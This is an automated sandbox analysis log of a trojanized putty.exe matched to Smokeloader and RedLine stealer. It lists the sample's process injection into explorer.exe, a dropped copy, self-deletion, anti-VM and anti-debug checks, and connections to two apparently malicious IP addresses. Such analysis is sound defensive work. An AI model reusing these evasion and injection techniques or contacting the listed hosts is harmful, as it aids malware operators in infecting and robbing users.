                Source: explorer.exe, 00000002.00000000.2166756581.0000000008890000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.2166091631.0000000007DC0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.2166717992.0000000008870000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://schemas.micro
                Source: explorer.exe, 00000002.00000000.2170453754.000000000C81C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/J
                Source: explorer.exe, 00000002.00000000.2169811038.000000000C4DC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe
                Source: explorer.exe, 00000002.00000000.2164199732.00000000076F8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://android.notify.windows.com/iOS
                Source: explorer.exe, 00000002.00000000.2167378082.0000000009ADB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/
                Source: explorer.exe, 00000002.00000000.2164199732.0000000007637000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
                Source: explorer.exe, 00000002.00000000.2162348523.00000000035FA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://arc.msn.coml
                Source: explorer.exe, 00000002.00000000.2167378082.0000000009B41000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://excel.office.com
                Source: explorer.exe, 00000002.00000000.2167378082.0000000009B41000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.com
                Source: explorer.exe, 00000002.00000000.2169811038.000000000C460000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://powerpoint.office.comcember
                Source: explorer.exe, 00000002.00000000.2167378082.00000000099C0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://wns.windows.com/)s
                Source: explorer.exe, 00000002.00000000.2167378082.00000000099C0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://word.office.comon

                Key, Mouse, Clipboard, Microphone and Screen Capturing

                Source: Yara matchFile source: 4.3.hajefwb.890000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.2.hajefwb.880e67.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.putty.exe.940e67.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.3.putty.exe.950000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.2.hajefwb.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.putty.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.2177513700.0000000002471000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.2439563956.00000000009E1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.2439353004.0000000000890000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2177303401.0000000000950000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.2110499167.0000000000950000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000003.2388445359.0000000000890000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

                System Summary

                Source: 00000000.00000002.2177513700.0000000002471000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                Source: 00000004.00000002.2439563956.00000000009E1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                Source: 00000004.00000002.2439322888.0000000000880000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                Source: 00000004.00000002.2439353004.0000000000890000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                Source: 00000000.00000002.2177303401.0000000000950000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                Source: 00000004.00000002.2439682112.0000000000AA8000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                Source: 00000000.00000002.2177166657.0000000000849000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                Source: 00000000.00000002.2177275719.0000000000940000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                Source: C:\Windows\explorer.exeProcess Stats: CPU usage > 49%
                Source: C:\Users\user\Desktop\putty.exeCode function: 0_2_00402F8F RtlCreateUserThread,NtTerminateProcess,0_2_00402F8F
                Source: C:\Users\user\Desktop\putty.exeCode function: 0_2_004013BF NtAllocateVirtualMemory,NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_004013BF
                Source: C:\Users\user\Desktop\putty.exeCode function: 0_2_00401412 NtAllocateVirtualMemory,0_2_00401412
                Source: C:\Users\user\Desktop\putty.exeCode function: 0_2_004013CA NtAllocateVirtualMemory,0_2_004013CA
                Source: C:\Users\user\Desktop\putty.exeCode function: 0_2_004014D3 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_004014D3
                Source: C:\Users\user\Desktop\putty.exeCode function: 0_2_004013D9 NtAllocateVirtualMemory,0_2_004013D9
                Source: C:\Users\user\Desktop\putty.exeCode function: 0_2_004013E0 NtAllocateVirtualMemory,0_2_004013E0
                Source: C:\Users\user\Desktop\putty.exeCode function: 0_2_004013F0 NtAllocateVirtualMemory,0_2_004013F0
                Source: C:\Users\user\Desktop\putty.exeCode function: 0_2_004013F4 NtAllocateVirtualMemory,0_2_004013F4
                Source: C:\Users\user\Desktop\putty.exeCode function: 0_2_004014F7 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_004014F7
                Source: C:\Users\user\Desktop\putty.exeCode function: 0_2_004014B5 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_004014B5
                Source: C:\Users\user\AppData\Roaming\hajefwbCode function: 4_2_00402F8F RtlCreateUserThread,NtTerminateProcess,4_2_00402F8F
                Source: C:\Users\user\AppData\Roaming\hajefwbCode function: 4_2_004013BF NtAllocateVirtualMemory,NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,4_2_004013BF
                Source: C:\Users\user\AppData\Roaming\hajefwbCode function: 4_2_00401412 NtAllocateVirtualMemory,4_2_00401412
                Source: C:\Users\user\AppData\Roaming\hajefwbCode function: 4_2_004013CA NtAllocateVirtualMemory,4_2_004013CA
                Source: C:\Users\user\AppData\Roaming\hajefwbCode function: 4_2_004014D3 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,4_2_004014D3
                Source: C:\Users\user\AppData\Roaming\hajefwbCode function: 4_2_004013D9 NtAllocateVirtualMemory,4_2_004013D9
                Source: C:\Users\user\AppData\Roaming\hajefwbCode function: 4_2_004013E0 NtAllocateVirtualMemory,4_2_004013E0
                Source: C:\Users\user\AppData\Roaming\hajefwbCode function: 4_2_004013F0 NtAllocateVirtualMemory,4_2_004013F0
                Source: C:\Users\user\AppData\Roaming\hajefwbCode function: 4_2_004013F4 NtAllocateVirtualMemory,4_2_004013F4
                Source: C:\Users\user\AppData\Roaming\hajefwbCode function: 4_2_004014F7 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,4_2_004014F7
                Source: C:\Users\user\AppData\Roaming\hajefwbCode function: 4_2_004014B5 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,4_2_004014B5
                Source: C:\Users\user\Desktop\putty.exeCode function: 0_2_0041E7A00_2_0041E7A0
                Source: C:\Users\user\Desktop\putty.exeCode function: 0_2_00421B7C0_2_00421B7C
                Source: C:\Users\user\Desktop\putty.exeCode function: 0_2_004207230_2_00420723
                Source: C:\Users\user\Desktop\putty.exeCode function: 0_2_004201DF0_2_004201DF
                Source: C:\Users\user\Desktop\putty.exeCode function: 0_2_0041FC9B0_2_0041FC9B
                Source: C:\Users\user\AppData\Roaming\hajefwbCode function: 4_2_0041E7A04_2_0041E7A0
                Source: C:\Users\user\AppData\Roaming\hajefwbCode function: 4_2_00421B7C4_2_00421B7C
                Source: C:\Users\user\AppData\Roaming\hajefwbCode function: 4_2_004207234_2_00420723
                Source: C:\Users\user\AppData\Roaming\hajefwbCode function: 4_2_004201DF4_2_004201DF
                Source: C:\Users\user\AppData\Roaming\hajefwbCode function: 4_2_0041FC9B4_2_0041FC9B
                Source: putty.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: 00000000.00000002.2177513700.0000000002471000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                Source: 00000004.00000002.2439563956.00000000009E1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                Source: 00000004.00000002.2439322888.0000000000880000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                Source: 00000004.00000002.2439353004.0000000000890000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                Source: 00000000.00000002.2177303401.0000000000950000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                Source: 00000004.00000002.2439682112.0000000000AA8000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                Source: 00000000.00000002.2177166657.0000000000849000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                Source: 00000000.00000002.2177275719.0000000000940000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                Source: classification engineClassification label: mal100.troj.evad.winEXE@3/2@3/2
                Source: C:\Users\user\Desktop\putty.exeCode function: 0_2_0084CB80 CreateToolhelp32Snapshot,Module32First,0_2_0084CB80
                Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\hajefwbJump to behavior
                Source: putty.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Windows\explorer.exeFile read: C:\Users\desktop.iniJump to behavior
                Source: C:\Users\user\Desktop\putty.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: putty.exeVirustotal: Detection: 37%
                Source: putty.exeReversingLabs: Detection: 47%
                Source: unknownProcess created: C:\Users\user\Desktop\putty.exe "C:\Users\user\Desktop\putty.exe"
                Source: unknownProcess created: C:\Users\user\AppData\Roaming\hajefwb C:\Users\user\AppData\Roaming\hajefwb
                Source: unknownProcess created: C:\Users\user\AppData\Roaming\hajefwb C:\Users\user\AppData\Roaming\hajefwb
                Source: C:\Users\user\Desktop\putty.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\putty.exeSection loaded: msimg32.dllJump to behavior
                Source: C:\Users\user\Desktop\putty.exeSection loaded: msvcr100.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: windows.cloudstore.schema.shell.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: taskschd.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: webio.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: mfsrcsnk.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\hajefwbSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\hajefwbSection loaded: msimg32.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\hajefwbSection loaded: msvcr100.dllJump to behavior
                Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32Jump to behavior
                Source: C:\Users\user\Desktop\putty.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior

                Data Obfuscation

                Source: C:\Users\user\Desktop\putty.exeUnpacked PE file: 0.2.putty.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:EW;
                Source: C:\Users\user\AppData\Roaming\hajefwbUnpacked PE file: 4.2.hajefwb.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:EW;
                Source: C:\Users\user\Desktop\putty.exeCode function: 0_2_00401068 push ebp; iretd 0_2_0040106E
                Source: C:\Users\user\Desktop\putty.exeCode function: 0_2_004010B4 push ss; ret 0_2_004010B5
                Source: C:\Users\user\Desktop\putty.exeCode function: 0_2_0084D68A push ebp; iretd 0_2_0084D690
                Source: C:\Users\user\Desktop\putty.exeCode function: 0_2_0084DDCA push es; iretd 0_2_0084DDCB
                Source: C:\Users\user\Desktop\putty.exeCode function: 0_2_0084D6D6 push ss; ret 0_2_0084D6D7
                Source: C:\Users\user\Desktop\putty.exeCode function: 0_2_008540EC push esi; retf 0_2_008540ED
                Source: C:\Users\user\Desktop\putty.exeCode function: 0_2_0084F64C push ebx; ret 0_2_0084F652
                Source: C:\Users\user\Desktop\putty.exeCode function: 0_2_00851B62 push ds; ret 0_2_00851B75
                Source: C:\Users\user\Desktop\putty.exeCode function: 0_2_009418DC push es; iretd 0_2_009418DD
                Source: C:\Users\user\Desktop\putty.exeCode function: 0_2_009410CF push ebp; iretd 0_2_009410D5
                Source: C:\Users\user\Desktop\putty.exeCode function: 0_2_0094111B push ss; ret 0_2_0094111C
                Source: C:\Users\user\AppData\Roaming\hajefwbCode function: 4_2_00401068 push ebp; iretd 4_2_0040106E
                Source: C:\Users\user\AppData\Roaming\hajefwbCode function: 4_2_004010B4 push ss; ret 4_2_004010B5
                Source: C:\Users\user\AppData\Roaming\hajefwbCode function: 4_2_008810CF push ebp; iretd 4_2_008810D5
                Source: C:\Users\user\AppData\Roaming\hajefwbCode function: 4_2_008818DC push es; iretd 4_2_008818DD
                Source: C:\Users\user\AppData\Roaming\hajefwbCode function: 4_2_0088111B push ss; ret 4_2_0088111C
                Source: C:\Users\user\AppData\Roaming\hajefwbCode function: 4_2_00AB2BB4 push esi; retf 4_2_00AB2BB5
                Source: C:\Users\user\AppData\Roaming\hajefwbCode function: 4_2_00AAC19E push ss; ret 4_2_00AAC19F
                Source: C:\Users\user\AppData\Roaming\hajefwbCode function: 4_2_00AAC892 push es; iretd 4_2_00AAC893
                Source: C:\Users\user\AppData\Roaming\hajefwbCode function: 4_2_00AB062A push ds; ret 4_2_00AB063D
                Source: C:\Users\user\AppData\Roaming\hajefwbCode function: 4_2_00AAE114 push ebx; ret 4_2_00AAE11A
                Source: C:\Users\user\AppData\Roaming\hajefwbCode function: 4_2_00AAC152 push ebp; iretd 4_2_00AAC158
                Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\hajefwbJump to dropped file

                Hooking and other Techniques for Hiding and Protection

                Source: C:\Windows\explorer.exeFile deleted: c:\users\user\desktop\putty.exeJump to behavior
                Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Roaming\hajefwb:Zone.Identifier read attributes | deleteJump to behavior
                Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                Source: C:\Users\user\Desktop\putty.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                Source: C:\Users\user\AppData\Roaming\hajefwbKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                Source: C:\Users\user\Desktop\putty.exeAPI/Special instruction interceptor: Address: 7FF8C88EE814
                Source: C:\Users\user\Desktop\putty.exeAPI/Special instruction interceptor: Address: 7FF8C88ED584
                Source: C:\Users\user\AppData\Roaming\hajefwbAPI/Special instruction interceptor: Address: 7FF8C88EE814
                Source: C:\Users\user\AppData\Roaming\hajefwbAPI/Special instruction interceptor: Address: 7FF8C88ED584
                Source: putty.exe, 00000000.00000002.2176960417.000000000083E000.00000004.00000020.00020000.00000000.sdmp, hajefwb, 00000004.00000002.2439614635.0000000000A9E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ASWHOOK
                Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 382Jump to behavior
                Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 848Jump to behavior
                Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 1113Jump to behavior
                Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 3608Jump to behavior
                Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 866Jump to behavior
                Source: C:\Windows\explorer.exe TID: 1708Thread sleep count: 382 > 30Jump to behavior
                Source: C:\Windows\explorer.exe TID: 3504Thread sleep count: 848 > 30Jump to behavior
                Source: C:\Windows\explorer.exe TID: 3504Thread sleep time: -84800s >= -30000sJump to behavior
                Source: C:\Windows\explorer.exe TID: 6104Thread sleep count: 1113 > 30Jump to behavior
                Source: C:\Windows\explorer.exe TID: 6104Thread sleep time: -111300s >= -30000sJump to behavior
                Source: C:\Windows\explorer.exe TID: 5688Thread sleep count: 249 > 30Jump to behavior
                Source: C:\Windows\explorer.exe TID: 5880Thread sleep count: 308 > 30Jump to behavior
                Source: C:\Windows\explorer.exe TID: 5880Thread sleep time: -30800s >= -30000sJump to behavior
                Source: C:\Windows\explorer.exe TID: 380Thread sleep count: 295 > 30Jump to behavior
                Source: C:\Windows\explorer.exe TID: 6104Thread sleep count: 3608 > 30Jump to behavior
                Source: C:\Windows\explorer.exe TID: 6104Thread sleep time: -360800s >= -30000sJump to behavior
                Source: explorer.exe, 00000002.00000000.2164199732.00000000076F8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}99105f770555d7dd
                Source: explorer.exe, 00000002.00000000.2167378082.0000000009AF9000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW0r
                Source: explorer.exe, 00000002.00000000.2167378082.0000000009B41000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
                Source: explorer.exe, 00000002.00000000.2167378082.0000000009B41000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: NXTcaVMWare
                Source: explorer.exe, 00000002.00000000.2167378082.0000000009B41000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000%
                Source: explorer.exe, 00000002.00000000.2167378082.0000000009B41000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                Source: explorer.exe, 00000002.00000000.2162348523.0000000003530000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware, Inc.
                Source: explorer.exe, 00000002.00000000.2167378082.0000000009B41000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00
                Source: explorer.exe, 00000002.00000000.2161750223.0000000000F13000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000A
                Source: explorer.exe, 00000002.00000000.2162348523.0000000003530000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware-42 27 d9 2e dc 89 72 dX
                Source: explorer.exe, 00000002.00000000.2164199732.00000000076F8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}^
                Source: explorer.exe, 00000002.00000000.2167378082.0000000009B2C000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: explorer.exe, 00000002.00000000.2162348523.0000000003530000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware, Inc.NoneVMware-42 27 d9 2e dc 89 72 dX
                Source: explorer.exe, 00000002.00000000.2162348523.0000000003530000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware,p
                Source: explorer.exe, 00000002.00000000.2167378082.0000000009B41000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000_
                Source: explorer.exe, 00000002.00000000.2167378082.0000000009B41000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}0#{5-
                Source: explorer.exe, 00000002.00000000.2161750223.0000000000F13000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
                Source: explorer.exe, 00000002.00000000.2167378082.0000000009B41000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
                Source: explorer.exe, 00000002.00000000.2164199732.000000000769A000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                Source: C:\Users\user\Desktop\putty.exe | System information queried: ModuleInformation
                Source: C:\Users\user\Desktop\putty.exe | Process information queried: ProcessInformation

                Anti Debugging

                Source: C:\Users\user\Desktop\putty.exe | System information queried: CodeIntegrityInformation
                Source: C:\Users\user\AppData\Roaming\hajefwb | System information queried: CodeIntegrityInformation
                Source: C:\Users\user\Desktop\putty.exe | Process queried: DebugPort
                Source: C:\Users\user\AppData\Roaming\hajefwb | Process queried: DebugPort
                Source: C:\Users\user\Desktop\putty.exe | Code function: 0_2_0084C45D push dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\putty.exe | Code function: 0_2_00940D90 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\putty.exe | Code function: 0_2_0094092B mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Roaming\hajefwb | Code function: 4_2_00880D90 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Roaming\hajefwb | Code function: 4_2_0088092B mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Roaming\hajefwb | Code function: 4_2_00AAAF25 push dword ptr fs:[00000030h]

                HIPS / PFW / Operating System Protection Evasion

                Source: C:\Windows\explorer.exe | File created: hajefwb.2.dr
                Source: C:\Windows\explorer.exe | Network Connect: 94.156.177.51 80
                Source: C:\Windows\explorer.exe | Network Connect: 194.85.61.76 80
                Source: C:\Users\user\Desktop\putty.exe | Thread created: C:\Windows\explorer.exe EIP: 3041998
                Source: C:\Users\user\AppData\Roaming\hajefwb | Thread created: unknown EIP: 8381998
                Source: C:\Users\user\Desktop\putty.exe | Section loaded: NULL target: C:\Windows\explorer.exe protection: read write
                Source: C:\Users\user\Desktop\putty.exe | Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read
                Source: C:\Users\user\AppData\Roaming\hajefwb | Section loaded: NULL target: C:\Windows\explorer.exe protection: read write
                Source: C:\Users\user\AppData\Roaming\hajefwb | Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read
